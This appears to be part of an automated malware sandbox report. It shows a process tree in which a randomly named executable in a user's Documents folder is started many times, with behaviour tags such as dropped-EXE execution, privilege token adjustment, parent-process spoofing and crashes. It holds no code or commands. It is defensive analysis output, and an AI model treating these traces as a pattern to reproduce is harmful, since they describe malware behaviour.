C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵
- Executes dropped EXE
PID:4536
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵
- Executes dropped EXE
PID:2564
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵
- Executes dropped EXE
PID:2856
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵
- Executes dropped EXE
PID:5676
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵
- Executes dropped EXE
PID:5664
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵
- Executes dropped EXE
PID:3840
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:3996
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:5600
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:5132
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:3092
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3092 -s 284⤵
- Program crash
PID:6276
-
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:5684
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:6324
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:6724
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:7116
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7116 -s 284⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:7060
-
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:6356
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:584
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:5488
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:7348
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:7928
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:7380
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:1624
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:7384
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:8792
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:8644
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:2976
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:9088
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:820
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:5516
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:9900
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:9388
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:844
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:9932
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:6296
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:5896
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:9380
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9380 -s 284⤵
- Program crash
PID:6648
-
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:6136
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:1168
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:5984
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:5496
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:6524
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:1328
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:10556
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:11180
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:6888
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:7620
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:8112
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:10996
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:11068
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:8028
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6588
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:7660
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:7088
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:10440
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:3920
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:9008
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:6804
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:1960
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:6624
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:1264
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:792
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:8976
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:4828
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:6244
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:10836
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:10324
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:8076
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:4672
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5180
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:10576
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:10516
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:3620
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:5044
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:8696
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:10320
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:10232
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:6796
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:8524
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:8348
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:5212
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:7996
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:5108
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:7912
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:10580
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:6340
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:9044
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1452
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:7232
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:3440
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5376
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:3620
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:9720
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:9624
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:6812
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:6712
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:4524
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:4756
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:6816
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:11156
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:2888
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:4292
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:4168
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:11076
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:11592
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:13272
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:13148
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:12960
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:12592
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:2440
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:8580
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:2344
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:6172
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:7780
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7780 -s 284⤵
- Program crash
PID:4200
-
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:8676
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:1976
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:13616
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:14052
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:13456
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:13884
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:13536
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:13008
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:5260
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:3296
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:13420
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:14232
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:11860
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:12144
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:14064
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:10132
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:1352
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:13804
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:11312
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:7876
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:13688
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:11308
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:10228
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:3684
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:6824
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:12356
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:11896
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:13556
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:12708
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 12708 -s 284⤵
- Program crash
PID:10748
-
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:12676
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 12676 -s 284⤵
- Program crash
PID:14444
-
-
-
C:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exeC:\Users\Admin\Documents\_5oKSJ7ZYr2cbO6dLHZ0bKph.exe3⤵PID:12208
-
-
